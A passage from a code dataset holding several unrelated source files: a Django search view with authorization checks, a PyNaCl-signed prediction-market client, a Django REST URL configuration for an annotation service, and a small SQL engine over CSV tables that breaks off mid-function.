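# Added note (illustrative): at this point answer holds the text joined from the 'before'/'after' side of a nara/de/ha particle and has passed the stop-word filter.\n                    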
results.append(answer)\n return results\n\ndef to_ranked_items(items):\n rank_dict = {}\n #items => ['対策', '鼻炎', '対策', 'うるおい', ...]\n for item in items:\n if item in rank_dict.keys():\n rank_dict[item] += 1\n else:\n rank_dict[item] = 1\n #rank_dict => {'対策': 2, '鼻炎': 1, ...}\n keys = rank_dict.keys() # => ['対策', '鼻炎', ...]\n results = []\n for key in keys:\n count = rank_dict[key] # => 2\n result = {'name': key, 'count': count}\n results.append(result)\n #results => [{'name': '対策', 'count': 2}, ....]\n outputs = divide_by_count(results)\n return outputs\n\n\ndef divide_by_count(items):\n high_items = []\n middle_items = []\n low_items = []\n for item in items:\n if item['count'] > 2:\n high_items.append(item)\n elif item['count'] == 2:\n middle_items.append(item)\n else:\n low_items.append(item)\n outputs = []\n outputs.extend(high_items)\n outputs.extend(middle_items)\n outputs.extend(low_items)\n return outputs\n\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"katryo/task_search","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":12361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"16426857580","text":"from django.conf import settings\nfrom django.contrib.auth.mixins import AccessMixin\nfrom django.shortcuts import redirect\nfrom haystack.generic_views import SearchView\nfrom django.utils.translation import ugettext_lazy as _\nfrom .search_forms import AninstanceSearchForm\nfrom aninstance_framework import helpers, auth\n\n\nclass AninstanceSearchView(AccessMixin, SearchView):\n \"\"\" NOTES\n Search:\n Django-haystock search files are located thus:\n - aninstance/whoosh_index (auto gen)\n - aninstance/templates/search/indexes/<AN_APP>/<MODEL>_text.txt\n - aninstance/templates/search/indexes/search.html\n - aninstance/search_forms.py\n - aninstance/<AN_APP>/search_indexes.py\n - aninstance/urls.py\n - Don't forget to add the model(s) to be searched in the CBV's \"MODELS_TO_SEARCH[]\" attribute,\n AND ALSO for granularity, add specific models to the \"get\" method of CBV to restrict model to search further,\n e.g.\n\n self.MODELS_TO_SEARCH = {\n 'view_accounts': ['invoicing.client'], # if url param is \"view_accounts\", search model invoicing.client\n }\n if 'q' in request.GET: # if request via the search button, 'q' will be in request.GET, so go to search url\n return redirect(self.search_url) # search_url is constructed in AninstanceGenericView & passed to CBVs\n\n - Certainly don't forget to query request.GET for 'q' (as above) and redirect to the search URL if present, as\n the request to the view was therefore coming in after the search button had been clicked.\n\n - Don't forget to set the results_url in AninstanceSearchView \"model_search_conf\" method (below)\n\n - Update index with: ./manage.py rebuild_index\n Auth:\n Auth in the same way as AninstanceGenericView & it's child CBVs.\n AccessMixin included here to provide self.handle_no_permission() method\n for use when auth fails. 
AninstanceGenericView does auth by overriding dispatch method,\n but here it's done in get(), to keep it simple.\n \"\"\"\n\n RESULTS_HEADING = 'Matching search results'\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.models = []\n self.result_url = None\n self.auth_required = False # false as default\n\n def get_queryset(self):\n queryset = super(AninstanceSearchView, self).get_queryset()\n ## further filter queryset based on some set of criteria\n return queryset\n\n def get_context_data(self, *args, **kwargs):\n context = super(AninstanceSearchView, self).get_context_data(**kwargs)\n context.update({'panel_heading': _('Search'),\n 'form': AninstanceSearchForm({'models': self.models}),\n 'result_url': self.result_url,\n 'results_heading': self.RESULTS_HEADING})\n # return the context\n return context\n\n def get(self, request, *args, **kwargs):\n \"\"\"\n Handles GET requests and instantiates a blank version of the form.\n \"\"\"\n # define specifics for model searches, including authorization if necessary\n # return redirect('search_view')\n if self.model_search_conf(request): # if authenticated or authentication not required\n form_class = self.get_form_class()\n form = self.get_form(form_class)\n # update any session data (as this view not subclassing AninstanceGenericView, like normal)\n helpers.set_session_data(request)\n if form.is_valid():\n return self.form_valid(form)\n else:\n return self.form_invalid(form)\n else: # authentication was required but user not authenticated\n return self.handle_no_permission()\n\n def model_search_conf(self, request):\n # configs specific to each model search\n if 'models' in request.GET and 'q' in request.GET and not settings.DEMO:\n # # # CLIENT MODEL\n if helpers.phrase_check('invoicing.account')(request.GET.get('models')):\n self.result_url = '/invoicing/?action=view_account&id='\n return auth.Authenticate(request, level=auth.USER_LEVEL.get('staff')).auth()\n # # # INVOICE MODEL\n elif helpers.phrase_check('invoicing.invoice')(request.GET.get('models')):\n self.result_url = '/invoicing/?action=view_invoice&invoice_number='\n return auth.Authenticate(request, level=auth.USER_LEVEL.get('staff')).auth()\n # # # INVOICE ITEM MODEL\n elif helpers.phrase_check('invoicing.invoiceitem')(request.GET.get('models')):\n self.result_url = '/invoicing/?action=view_invoice_item&invoice_item_number='\n return auth.Authenticate(request, level=auth.USER_LEVEL.get('staff')).auth()\n # # # ANY OTHER MODEL NOT DEFINED ABOVE AS REQUIRING AUTHENTICATION TO SEARCH\n else:\n return True # authenticate request for anyone by default\n # if NO model chosen but a search query is being run, DO NOT authenticate\n elif 'q' in request.GET and 'models' not in request.GET:\n return False\n return True # authenticate requests as default where there are NO search queries (just display form)\n","repo_name":"UplandsDynamic/invoicing","sub_path":"aninstance_framework/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":5369,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"57"} +{"seq_id":"4093718809","text":"\nimport pandas as pd\n\n\n# Crypto imports\nimport nacl.encoding\nimport nacl.signing\n\n\nclass MarketClient(object):\n # 'Market client class'\n\n def __init__(self):\n self.signingKey_hex = []\n self.verifyKey_hex = []\n\n def generateSignatureKeys(self):\n # Generate signature key pairs.\n\n # Create signing key\n signingKey = nacl.signing.SigningKey.generate()\n # Obtain the verify key for 
a given signing key\n verifyKey = signingKey.verify_key\n\n # Serialize the verify key to send it to a third party\n signingKey_hex = signingKey.encode(encoder=nacl.encoding.HexEncoder)\n verifyKey_hex = verifyKey.encode(encoder=nacl.encoding.HexEncoder)\n\n # Set as properties\n self.signingKey_hex = signingKey_hex.decode('UTF-8')\n self.verifyKey_hex = verifyKey_hex.decode('UTF-8')\n\n return signingKey_hex, verifyKey_hex\n\n def signMessage(self, msg: object, signingKey_hex: str) -> object:\n # Sign a message\n signingKey_bytes = b'%s' % str.encode(signingKey_hex, 'utf-8')\n # Generate signing key\n signingKey = nacl.signing.SigningKey(signingKey_bytes,\n encoder=nacl.encoding.HexEncoder)\n # Sign message\n signed = signingKey.sign(msg)\n return signed\n\n def verifyMessage(self, signature: bytes,\n signatureMsg: bytes,\n verifyKey_hex: str) -> object:\n # Verify message\n verifyKey = nacl.signing.VerifyKey(verifyKey_hex,\n encoder=nacl.encoding.HexEncoder)\n verified = verifyKey.verify(signatureMsg, signature=signature)\n return verified\n\n def signMarketTable(self, marketRow: object,\n previousMarketRow: object,\n signatureKey_hex: str) -> object:\n # Sign market row\n msg = \\\n str(marketRow.loc[0,'marketRootId']).encode(\"utf-8\")+\\\n str(marketRow.loc[0,'marketBranchId']).encode(\"utf-8\")+\\\n str(marketRow.loc[0, 'marketBranchId']).encode(\"utf-8\")+ \\\n str(marketRow.loc[0, 'marketMin']).encode(\"utf-8\") + \\\n str(marketRow.loc[0,'marketMax']).encode(\"utf-8\")+\\\n str(marketRow.loc[0, 'marketMax']).encode(\"utf-8\")+\\\n previousMarketRow.loc[0, 'signature'] + b'end'\n\n sig = self.signMessage(msg=msg, signingKey_hex=signatureKey_hex)\n newMarketRow = pd.DataFrame({'marketRootId': marketRow['marketRootId'],\n 'marketBranchId': marketRow['marketBranchId'],\n 'marketMin': marketRow['marketMin'],\n 'marketMax': marketRow['marketMax'],\n 'previousSig': previousMarketRow['signature'],\n 'signatureMsg': sig.message,\n 'signature': sig.signature,\n 'traderId': marketRow['traderId']})\n\n signedMarketTable = newMarketRow.reset_index(drop=True)\n return signedMarketTable\n\n def signOrderBook(self, orderRow: object,\n previousOrderRow: object,\n signatureKey_hex: str) -> object:\n # Sign previous signature (all columns in order up to previous signature)\n\n # Encode signature message in bytes\n msg =\\\n str(orderRow.loc[0,'tradeRootId']).encode(\"utf-8\")+\\\n str(orderRow.loc[0,'tradeBranchId']).encode(\"utf-8\")+\\\n str(orderRow.loc[0,'price']).encode(\"utf-8\")+\\\n str(orderRow.loc[0,'quantity']).encode(\"utf-8\")+\\\n str(orderRow.loc[0,'marketRootId']).encode('utf-8')+\\\n str(orderRow.loc[0,'marketBranchId']).encode(\"utf-8\")+\\\n str(orderRow.loc[0,'traderId']).encode(\"utf-8\")+\\\n previousOrderRow.loc[0,'signature'] + b'end'\n # Sign message\n sig = self.signMessage(msg=msg, signingKey_hex=signatureKey_hex)\n # Debugging chk that signature is correct\n chk = self.verifyMessage(signature=sig.signature, signatureMsg=msg,\n verifyKey_hex=self.verifyKey_hex)\n newOrderRow = pd.DataFrame({'tradeRootId': orderRow['tradeRootId'],\n 'tradeBranchId': orderRow['tradeBranchId'],\n 'price': orderRow['price'],\n 'quantity': orderRow['quantity'],\n 'marketRootId': orderRow['marketRootId'],\n 'marketBranchId': orderRow['marketBranchId'],\n 'traderId': orderRow['traderId'],\n 'previousSig': previousOrderRow['signature'],\n 'signatureMsg': sig.message,\n 'signature': sig.signature})\n # # Debugging check that orderRow has correct signature\n chk = newOrderRow['signature'] == 
bytes(sig.signature)\n signedOrderBook = newOrderRow\n return signedOrderBook\n\n def tradeMaker(self, prevTrade: object,\n tradeRow: object)->object:\n # Construct a signed trade package (primary/offset/match), possibly\n # for list of prices.\n\n if isinstance(tradeRow.loc[0,'price'], list):\n numPrices = len(tradeRow.loc[0,'price'])\n else:\n numPrices = 1\n\n tradeRootId = prevTrade.loc[0,'tradeRootId'] + 1\n # Sign trades\n pT = pd.DataFrame()\n oT = pd.DataFrame()\n mT = pd.DataFrame()\n for iPrice in range(numPrices):\n # Generate primary trade\n if isinstance(tradeRow.loc[0,'price'], list):\n price = float(tradeRow.loc[0,'price'][iPrice])\n else:\n price = float(tradeRow.loc[0,'price'])\n\n # Generate primary trade\n t = pd.DataFrame({'tradeRootId': [int(tradeRootId)],\n 'tradeBranchId': [int(1)],\n 'marketRootId': [int(tradeRow.loc[0,'marketRootId'])],\n 'marketBranchId': [int(tradeRow.loc[0,'marketBranchId'])],\n 'price': [price],\n 'quantity': [float(tradeRow.loc[0,'quantity'])],\n 'traderId': [int(tradeRow.loc[0,'traderId'])]})\n p = self.signOrderBook(orderRow=t, previousOrderRow=prevTrade,\n signatureKey_hex=self.signingKey_hex)\n chk = self.verifyMessage(signature=p.loc[0,'signature'],\n signatureMsg=p.loc[0,'signatureMsg'],\n verifyKey_hex=self.verifyKey_hex)\n pT = pd.concat([pT, p])\n # Generate offset trade\n o = t\n o = o.loc[:,['tradeRootId', 'tradeBranchId', 'marketRootId', 'marketBranchId', 'price', 'traderId']]\n o.loc[0,'quantity'] = t.loc[0,'quantity'] * -1\n o.loc[0,'tradeBranchId'] = int(2)\n o = self.signOrderBook(orderRow=o, previousOrderRow=p,\n signatureKey_hex=self.signingKey_hex)\n chk = self.verifyMessage(signature=o.loc[0,'signature'],\n signatureMsg=o.loc[0,'signatureMsg'],\n verifyKey_hex=self.verifyKey_hex)\n oT = pd.concat([oT, o])\n # Generate match trade\n m = o;\n m = m.loc[:,['tradeRootId', 'tradeBranchId', 'marketRootId', 'marketBranchId', 'price', 'traderId']]\n m.loc[0,'quantity'] = o.loc[0,'quantity'] * -1\n m.loc[0,'tradeBranchId'] = int(3)\n m = self.signOrderBook(orderRow=m, previousOrderRow=o,\n signatureKey_hex=self.signingKey_hex)\n chk = self.verifyMessage(signature=m.loc[0,'signature'],\n signatureMsg=m.loc[0,'signatureMsg'],\n verifyKey_hex=self.verifyKey_hex)\n mT = pd.concat([mT, m])\n\n tradePackage = pd.concat([pT, oT, mT]).reset_index(drop=True)\n\n return tradePackage\n\n def marketMaker(self, previousMarketRow: object,\n marketRow: object) -> object:\n # Construct a signed market row\n\n marketPackage = self.signMarketTable(marketRow=marketRow,\n previousMarketRow=previousMarketRow,\n signatureKey_hex=self.signingKey_hex)\n\n return marketPackage\n\n # Create functions for the 'client'. 
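    # Aside (illustrative only, not part of this class): a minimal PyNaCl round
    # trip showing the sign/verify pattern that signMessage/verifyMessage above
    # rely on; the key and message names here are made up.
    #
    #   sk = nacl.signing.SigningKey.generate()
    #   vk_hex = sk.verify_key.encode(encoder=nacl.encoding.HexEncoder)
    #   signed = sk.sign(b'order payload')  # SignedMessage with .message and .signature
    #   nacl.signing.VerifyKey(vk_hex, encoder=nacl.encoding.HexEncoder).verify(
    #       signed.message, signature=signed.signature)  # raises BadSignatureError if tampered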
At present these pass in a MarketServer\n # object but a proper version they will send to a remote server somewhere.\n #\n # createUser_client()\n # createTrade_client()\n # createMarket_client()\n\n def createUser_client(self, marketServer=None):\n \"\"\"Wrapper for createUser from marketServer\"\"\"\n # When this is split out, create user by sending a post request to the\n # createUser() endpoint rather than to a local version of MarketServer.\n # (need to import requests)\n newUsr = marketServer.createUser(self.verifyKey_hex)\n return newUsr\n\n def createTrade_client(self, tradeRow:object, marketServer=None):\n \"\"\"\n Wrapper for createTrade from marketServer\n :param: tradeRow: (DataFrame) trade\n :param: marketServer: (MarketServer) market server\n\n :return allTradeChecks: (boolean) True if all trade checks pass\n :return colChk: (boolean) True if collateral checks pass\n\n Example::\n ms = MarketServer()\n mc = MarketClient()\n ...\n tradeRow = pd.DataFrame({'marketRootId': [1],\n 'marketBranchId': [1],\n 'price': [[0.5, 0.4]],\n 'quantity': [1],\n 'traderId': [1]})\n mc.createTrade_client(tradeRow=tradeRow, MarketServer = ms)\n \"\"\"\n prevTrade = marketServer.getPreviousTrade()\n tradePackage = self.tradeMaker(prevTrade=prevTrade,\n tradeRow=tradeRow).reset_index(drop=True)\n allTradeChks, colChk = marketServer.createTrade(tradePackage=tradePackage)\n return allTradeChks, colChk\n\n def createMarket_client(self, marketRow: object, marketServer=None):\n \"\"\"\n Wrapper for createMarket from marketServer.\n\n :param: marketRow: (DataFrame) market\n :param: marketServer: (MarketServer) market server\n\n :return: checks (bool) true if market created\n\n Example::\n ms = MarketServer()\n mc = MarketClient()\n ...\n marketRow = pd.DataFrame({'marketRootId': [1],\n 'marketBranchId': [1],\n 'marketMin': [0],\n 'marketMax': [0],\n 'traderId': [1]})\n mc.createMarket_client(marketRow=marketRow, MarketServer = ms)\n\n .. 
note::\n \"\"\"\n\n prevMarket = marketServer.getPreviousMarket()\n testMarket = self.marketMaker(prevMarket, marketRow)\n checks = marketServer.createMarket(newMarket=testMarket)\n return checks\n\n\n\n# - Think about splitting out mc/ms:\n# => Modify or split out MarketClient.createUser_client()/createTrade_client()/createMarket_client() so that instead of taking a\n# MarketServer object they just talk to the api endpoints for MarketServer.\n# =>\n\n","repo_name":"alpinechicken/blocmarket","sub_path":"previousversions/python/MarketObject/MarketClient.py","file_name":"MarketClient.py","file_ext":"py","file_size_in_byte":11611,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"57"} +{"seq_id":"10084343301","text":"from django.urls import path\nfrom rest_framework.urlpatterns import format_suffix_patterns\nfrom rest_framework.schemas import get_schema_view\nfrom annotator import views\n\nschema_view = get_schema_view(title='Pastebin API')\n\nurlpatterns = [\n path('schema/', schema_view, name='schema'),\n #path('annotator/', views.snippet_list),\n path('annotator/', views.api_root),\n path('annotator/model/', views.ModelList.as_view(), name='model-list'),\n path('annotator/model/<int:pk>/', views.ModelDetail.as_view(), name='model-detail'),\n path('annotator/model/<int:pk>/train/', views.trainModel, name='model-train'),\n path('annotator/model/<int:mk>/annotate/<int:sk>/', views.annotate, name='model-annotate'),\n\n #path('annotator/model/findByTags/', views.model_list_by_tags),\n #path('annotator/model/findByStatus/', views.model_list_by_status),\n path('annotator/corpus/', views.CorpusList.as_view(), name='corpus-list'),\n path('annotator/corpus/<int:pk>/', views.CorpusDetail.as_view(), name='corpus-detail'),\n path('annotator/corpus/<int:pk>/segments/', views.SegmentsInCorpus.as_view(), name='corpussegment-list'),\n path('annotator/corpus/<int:pk>/addsegments/<str:s_list>/', views.addsegmentstocorpus, name='corpussegment-add'),\n path('annotator/corpus/<int:pk>/removesegments/<str:s_list>/', views.removesegmentsfromcorpus, name='corpussegment-remove'),\n\n path('annotator/segment/', views.SegmentList.as_view(), name='segment-list'),\n path('annotator/segment/<int:pk>/', views.SegmentDetail.as_view(), name='segment-detail'),\n path('annotator/segment/<int:pk>/annotations/', views.AnnotationsInSegment.as_view(), name='annotationsegment-detail'),\n path('annotator/segment/<int:pk>/addannotations/<str:s_list>/', views.addannotationstosegment, name='segmentannot-add'),\n path('annotator/segment/<int:pk>/removeannotations/<str:s_list>/', views.removeannotationsfromsegment, name='segmentannot-remove'),\n path('annotator/segment/<int:sk>/annotate/<int:mk>/', views.annotate, name='annotate'),\n path('annotator/annotation/', views.AnnotationList.as_view(), name='annotation-list'),\n path('annotator/annotation/<int:pk>/', views.AnnotationDetail.as_view(), name='annotation-detail'),\n path('annotator/textannotation/', views.TextAnnotationList.as_view(), name='textannotation-list'),\n path('annotator/textannotation/<int:pk>/', views.TextAnnotationDetail.as_view(), name='textannotation-detail'),\n path('annotator/audioannotation/', views.AudioAnnotationList.as_view(), name='audioannotation-list'),\n path('annotator/audioannotation/<int:pk>/', views.AudioAnnotationDetail.as_view(), name='audioannotation-detail'),\n path('annotator/spantextannotation/', views.SpanTextAnnotationList.as_view(), name='spantextannotation-list'),\n 
path('annotator/spantextannotation/<int:pk>/', views.SpanTextAnnotationDetail.as_view(), name='spantextannotation-detail'),\n path('users/', views.UserList.as_view(), name='user-list'),\n path('users/<int:pk>/', views.UserDetail.as_view(), name='user-detail'),\n path('', views.list_home, name='list_home'),\n path('index.html', views.list_home, name='list_home'),\n path('annotator/upload/', views.list_home, name='list_home'),\n path('annotator/home/', views.list_home, name='home'),\n path('annotator/irb_consent', views.irb_consent, name='irb_consent'),\n path('annotator/models/', views.list_models, name='models'),\n path('annotator/get_auth_token/', views.get_auth_token, name='get_auth_token'),\n path('annotator/check_auth_token/', views.check_auth_token, name='check_auth_token'),\n path('annotator/get_allosaurus_models/', views.get_allosaurus_models, name='get_allosaurus_models'),\n path('annotator/get_allosaurus_phones/<str:model_name>/<str:lang_id>/', views.get_allosaurus_phones, name='get_allosaurus_phones'),\n path('annotator/ocr-post-correction/', views.ocr_post_correction, name='ocr_post_correction'),\n path('annotator/test_single_source_ocr/', views.test_single_source_ocr, name='test_single_source_ocr'),\n path('annotator/train_single_source_ocr/', views.train_single_source_ocr, name='train_single_source_ocr'),\n path('annotator/ocr/', views.ocr_frontend, name='ocr_frontend'),\n path('annotator/download_file/<str:filename>', views.download_file, name='download_file'),\n path('annotator/kill_job/<str:job_id>', views.kill_job, name='kill_job'),\n path('annotator/profile', views.user_profile, name='user_profile'),\n path('annotator/get_model_ids', views.get_model_ids, name='get_model_ids'),\n]\n\nurlpatterns = format_suffix_patterns(urlpatterns)\nhandler404 = 'annotator.views.view_404'","repo_name":"neulab/cmulab","sub_path":"annotator/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":4656,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"57"} +{"seq_id":"10622198040","text":"import re\nimport sqlparse\nfrom sqlparse.sql import IdentifierList, Identifier, Where, Comparison, Parenthesis,Function\nfrom sqlparse.tokens import Keyword, DML, Wildcard\nimport csv\n\n\nclass Database:\n def __init__(self, location):\n self.location = location\n self.table_names = [] # all the table names\n self.tables = {} # dictionary of table objects, accessed by Tnames\n self.add_all_tables()\n\n def add_all_tables(self):\n f = open(self.location, \"r\")\n line = f.readline() # begin_table\n while line:\n line = line.split()[0]\n if line == '<begin_table>':\n cols = [] # all column names will be stores here\n line = f.readline()\n if not line or line == '<end_table>':\n return -1\n line = line.split()[0]\n Tname = line # Add table name to list here\n line = f.readline()\n if not line:\n return -1\n while line and line.split()[0] != '<end_table>':\n\n cols.append(line.split()[0])\n line = f.readline()\n\n self.table_names.append(Tname)\n self.tables[Tname] = Table(Tname, cols)\n\n else:\n return -1\n line = f.readline()\n\n\nclass Table():\n def __init__(self, name, cols):\n #print(name)\n self.name = name\n self.cols_names = cols\n self.table = []\n #self.col_dict = {}\n #self.init_col_dicts()\n self.fill_table()\n #self.print_rows()\n\n\n def fill_table(self):\n #f = open(self.name+\".csv\", \"r\")\n #line = f.readline()\n with open(self.name+\".csv\", 'r') as file:\n reader = csv.reader(file)\n for row in reader:\n self.table.append(row)\n\n 
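        # For reference, a sketch of the metadata.txt layout that
        # Database.add_all_tables() above appears to expect (inferred from the
        # parser, not documented elsewhere: table name first, then one column
        # name per line):
        #
        #   <begin_table>
        #   table1
        #   A
        #   B
        #   <end_table>
        #   <begin_table>
        #   table2
        #   ...
        #   <end_table>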
#while line:\n \n # list_my = line.strip('\\\"\"\\n\\r').split(',')\n # self.table.append(list_my)\n \"\"\"\n for i in range (len(self.cols_names)):\n #print(\"filling \"+list_my[i]+\" at \"+self.cols_names[i])\n self.col_dict[self.cols_names[i]].append(list_my[i])\n \"\"\"\n # line = f.readline()\n\n def print_rows(self):\n for row in self.table:\n print(row)\n\n\nclass Query():\n query = \"\"\n table = None\n dbase = None\n selectboolean = False\n fromboolean = False\n whereboolean = False\n groupbyboolean = False\n havingboolean = False\n orderbyboolean = False\n selectlist = []\n fromlist = []\n wherelist = []\n groupbylist = []\n orderbylist = []\n havinglist = []\n show_columns = []\n orderbycolumn = 0\n\n def __init__(self, query, db):\n self.dbase = db\n self.query = query\n\n def set_booleans(self):\n self.selectboolean = False\n self.fromboolean = False\n self.whereboolean = False\n self.groupbyboolean = False\n self.havingboolean = False\n self.orderbyboolean = False\n\n def add_token_to_list(self, sentence):\n sentence = sentence.replace(',', ' ')\n sentence = sentence.replace('(', ' ')\n sentence = sentence.replace(')', ' ')\n s = sentence.split(' ')\n for word in s:\n if word == ' ' or word == '':\n continue\n if self.selectboolean:\n self.selectlist.append(word)\n\n if self.fromboolean:\n self.fromlist.append(word)\n\n if self.groupbyboolean:\n self.groupbylist.append(word)\n\n if self.havingboolean:\n self.havinglist.append(word)\n\n if self.orderbyboolean:\n self.orderbylist.append(word)\n\n if self.whereboolean:\n self.wherelist.append(word)\n\n def parse_query(self):\n t = self.query\n q = sqlparse.format(t, keyword_case='upper')\n elements = sqlparse.parse(q)[0].tokens\n\n for token in elements:\n if token.ttype is Keyword:\n if token.value.upper() == \"FROM\":\n self.set_booleans()\n self.fromboolean = True\n if token.value.upper() == \"GROUP BY\":\n self.set_booleans()\n self.groupbyboolean = True\n if token.value.upper() == \"AVG\":\n self.add_token_to_list(token.value)\n if token.value.upper() == \"COUNT\":\n self.add_token_to_list(token.value)\n if token.value.upper() == \"MAX\":\n self.add_token_to_list(token.value)\n if token.value.upper() == \"MIN\":\n self.add_token_to_list(token.value)\n if token.value.upper() == \"DISTINCT\":\n self.add_token_to_list(token.value)\n if token.value.upper() == \"ORDER BY\":\n self.set_booleans()\n self.orderbyboolean = True\n \n\n if token.ttype is Wildcard:\n self.add_token_to_list(token.value)\n\n if token.ttype is DML:\n if token.value.upper() == \"SELECT\":\n self.set_booleans()\n self.selectboolean = True\n\n if isinstance(token, IdentifierList):\n self.add_token_to_list(token.value)\n\n if isinstance(token, Identifier):\n self.add_token_to_list(token.value)\n \n if isinstance(token, Function):\n self.add_token_to_list(token.value)\n\n if isinstance(token, Where):\n\n self.set_booleans()\n self.whereboolean = True\n self.add_token_to_list(token.value)\n self.set_booleans()\n\n if isinstance(token, Parenthesis):\n temp1 = token.value.replace(')', '')\n temp2 = temp1.replace('(', '')\n self.add_token_to_list(temp2)\n\n\n\n def executQuery(self):\n if len(self.fromlist) == 0:\n print(\"Atleast one table must be selected\")\n return \n if len(self.selectlist) == 0:\n print(\"Atleast one column must be selected\")\n return \n\n #print(\"where list \")\n #print(self.wherelist)\n #print(\"group by list \")\n #print (self.groupbylist)\n #print(\"select list is \")\n #print(self.selectlist)\n #print(\"order by list \")\n 
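        # Sketch (kept as comments so this method stays runnable) of the sqlparse
        # token walk that parse_query() performs, e.g. for
        # "SELECT A, B FROM t WHERE A > 5":
        #
        #   stmt = sqlparse.parse(q)[0]
        #   for tok in stmt.tokens:
        #       tok.ttype is DML                 -> the SELECT keyword
        #       isinstance(tok, IdentifierList)  -> "A, B"
        #       tok.ttype is Keyword             -> FROM / GROUP BY / ORDER BY
        #       isinstance(tok, Where)           -> the whole "WHERE A > 5" clause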
#print(self.orderbylist)\n\n\n\n self.loadTables() # from\n self.whereQuery() #where\n self.groupbyQuery() #groupby\n self.selectQuery() #select\n\n\n #print (\"orderbylist\")\n #print(self.orderbylist)\n #print(len(self.table.table))\n #print(\"col names \")\n #print(self.table.cols_names)\n \n self.orderbyQuery()\n self.show_sanitiized_table()\n\n def loadTables(self):\n for table in self.dbase.table_names:\n if table in self.fromlist:\n if self.table == None:\n self.table = self.dbase.tables[table]\n self.table.name = \"query_table\"\n\n else:\n table_temperary = self.dbase.tables[table]\n for cols in table_temperary.cols_names:\n self.table.cols_names.append(cols)\n\n t = []\n for my_row in self.table.table:\n for temp_row in table_temperary.table:\n t1 = my_row+temp_row\n t.append(t1)\n self.table.table = t\n \n \n def is_column(self,x):\n \n if x in self.table.cols_names:\n return True\n if re.search(\"^\\d+$\", x):\n return False\n return False\n\n def get_operator(self,operator):\n if \">\" == operator:\n operator_type = 1\n\n if \">=\" == operator:\n operator_type = 2\n\n if \"<\" == operator:\n operator_type = 3\n\n if \"<=\" == operator:\n operator_type = 4\n\n if \"=\" == operator:\n operator_type = 0\n\n return operator_type\n \n def whereQuery(self):\n\n if len(self.wherelist)==0:\n return\n if \"AND\" in self.wherelist:\n and_or_present = 1\n elif \"OR\" in self.wherelist:\n and_or_present = 2\n else:\n and_or_present = 3\n\n if \">\" in self.wherelist:\n operator_type = 1\n if \">=\" in self.wherelist:\n operator_type = 2\n if \"<\" in self.wherelist:\n operator_type = 3\n if \"<=\" in self.wherelist:\n operator_type = 4\n if \"=\" in self.wherelist:\n operator_type = 0\n newtable1 = []\n newtable2 = []\n newtable = []\n\n \n\n if and_or_present == 3:\n if self.wherelist[1] in self.table.cols_names:\n if self.wherelist[3] in self.table.cols_names:\n newtable = self.resolveWhereQuery(\n operator_type, self.wherelist[1], self.wherelist[3])\n else:\n \n newtable = self.resolveWhereQuery(\n operator_type, self.wherelist[1], int(self.wherelist[3]))\n \n else:\n newtable = self.resolveWhereQuery(\n operator_type, int(self.wherelist[1]), self.wherelist[3])\n\n if and_or_present == 1:\n if self.is_column(self.wherelist[1]):\n p1=self.wherelist[1]\n else:\n p1=int(self.wherelist[1])\n\n if self.is_column(self.wherelist[3]):\n p2=self.wherelist[3]\n else:\n p2=int(self.wherelist[3])\n \n if self.is_column(self.wherelist[5]):\n p3=self.wherelist[5]\n else:\n p3=int(self.wherelist[5])\n \n if self.is_column(self.wherelist[7]):\n p4=self.wherelist[7]\n else:\n p4=int(self.wherelist[7])\n \n \n\n newtable1 = self.resolveWhereQuery(self.get_operator(self.wherelist[2]), p1, p2)\n newtable2 = self.resolveWhereQuery(self.get_operator(self.wherelist[6]),p3, p4)\n\n for row in self.table.table:\n if row in newtable1 and row in newtable2:\n newtable.append(row)\n \n\n\n\n if and_or_present == 2:\n if self.is_column(self.wherelist[1]):\n p1=self.wherelist[1]\n else:\n p1=int(self.wherelist[1])\n\n if self.is_column(self.wherelist[3]):\n p2=self.wherelist[3]\n else:\n p2=int(self.wherelist[3])\n \n if self.is_column(self.wherelist[5]):\n p3=self.wherelist[5]\n else:\n p3=int(self.wherelist[5])\n \n if self.is_column(self.wherelist[7]):\n p4=self.wherelist[7]\n else:\n p4=int(self.wherelist[7])\n \n \n\n newtable1 = self.resolveWhereQuery(self.get_operator(self.wherelist[2]), p1, p2)\n newtable2 = self.resolveWhereQuery(self.get_operator(self.wherelist[6]),p3, p4)\n\n for row in 
self.table.table:\n if row in newtable1 or row in newtable2:\n newtable.append(row)\n\n self.table.table = newtable \n\n\n def selectQuery(self):\n\n if \"*\" in self.selectlist:\n self.selectlist.remove(\"*\")\n for name in self.table.cols_names:\n self.selectlist.append(name)\n\n if len(self.groupbylist)==0:\n for i in range (0,len(self.selectlist)):\n if self.selectlist[i]==\"MAX\":\n a = i+1\n c = self.selectlist[a]\n self.domaxoncol(c)\n if self.selectlist[i]==\"MIN\":\n a = i+1\n c = self.selectlist[a]\n self.dominoncol(c)\n if self.selectlist[i]==\"AVG\":\n a = i+1\n c = self.selectlist[a]\n self.doavgoncol(c)\n if self.selectlist[i]==\"SUM\":\n a = i+1\n c = self.selectlist[a]\n self.dosumoncol(c)\n if self.selectlist[i]==\"COUNT\":\n a = i+1\n c = self.selectlist[a] \n self.docountoncol(c)\n \n self.table.table = [self.table.table[0]]\n\n else:\n for i in range (0,len(self.selectlist)):\n if self.selectlist[i]==\"MAX\":\n a = i+1\n c = self.selectlist[a]\n \n self.domaxontable(c)\n if self.selectlist[i]==\"MIN\":\n a = i+1\n c = self.selectlist[a]\n \n self.dominontable(c)\n if self.selectlist[i]==\"AVG\":\n a = i+1\n c = self.selectlist[a]\n \n self.doavgontable(c)\n if self.selectlist[i]==\"SUM\":\n a = i+1\n c = self.selectlist[a]\n \n self.dosumontable(c)\n if self.selectlist[i]==\"COUNT\":\n a = i+1\n c = self.selectlist[a]\n \n self.docountontable(c)\n \n self.convertlisttoval()\n \n def domaxoncol(self,col_name):\n col_num = 0\n for i in range (0,len(self.table.cols_names)):\n if col_name ==self.table.cols_names[i]:\n col_num = i\n break\n r=[]\n for row in self.table.table:\n r.append(int(row[col_num])) \n self.table.table[0][col_num]=max(r)\n \n def dosumoncol(self,col_name):\n col_num = 0\n for i in range (0,len(self.table.cols_names)):\n if col_name 